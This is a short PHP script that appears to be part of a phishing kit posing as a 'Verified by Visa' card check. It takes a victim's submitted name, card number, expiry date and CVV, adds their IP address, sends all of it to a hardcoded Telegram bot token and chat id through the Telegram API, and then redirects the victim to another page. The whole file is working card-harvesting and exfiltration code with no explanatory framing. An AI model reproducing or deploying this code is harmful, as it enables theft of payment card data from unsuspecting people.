<?php
$ip = getenv("REMOTE_ADDR");
$message .= "---- : || VBV DE Nostra || :------\n";
$message .= "Name: ".$_POST['1']."\n";
$message .= "CC: ".$_POST['3']."\n";
$message .= "Date: ".$_POST['4']."\n";
$message .= "Cvv: ".$_POST['5']."\n";
$message .= "----: || THANKS BE TO GOD || :------\n";
$message .= "IP: ".$ip."\n";
 
$token = "5830939589:AAEVxfo2qrsrokQrwrLaBfEpu_p7SgGgUeU";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=5468718251&text=" . urlencode($message)."" );
header("Location: loi.html");
?>